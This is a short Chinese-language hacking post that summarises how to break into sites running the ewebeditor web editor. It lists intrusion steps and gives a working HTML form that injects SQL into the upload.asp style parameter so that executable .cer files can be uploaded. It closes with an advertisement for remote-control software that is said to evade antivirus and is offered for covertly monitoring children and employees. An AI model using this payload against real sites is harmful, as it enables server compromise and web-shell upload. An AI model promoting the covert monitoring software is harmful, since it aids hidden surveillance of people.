ewebeditor漏洞利用总结
先从最基本的记录起!通常入侵ewebeditor编辑器的步骤如下:
1、首先访问默认管理页看是否存在。
2、默认管理帐号密码!
3、默认数据库地址。
4、说说漏洞基本利用步骤,还以asp为例!
5、默认管理页不存在!
6、ewebeditor的几个版本存在注入!
<form action="http://www.xxx.com/ewebeditor/upload.asp?action=save&type=IMAGE&style=standard'union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>
网络人远程控制软件
功能和灰鸽子之类软件基本一样,但是我们的软件不会被杀毒软件当作病毒查杀,稳定可靠。因此监控版主要用于家长对儿童、企业对员工的监控。
更多资讯:
手机黑客软件
远程控制命令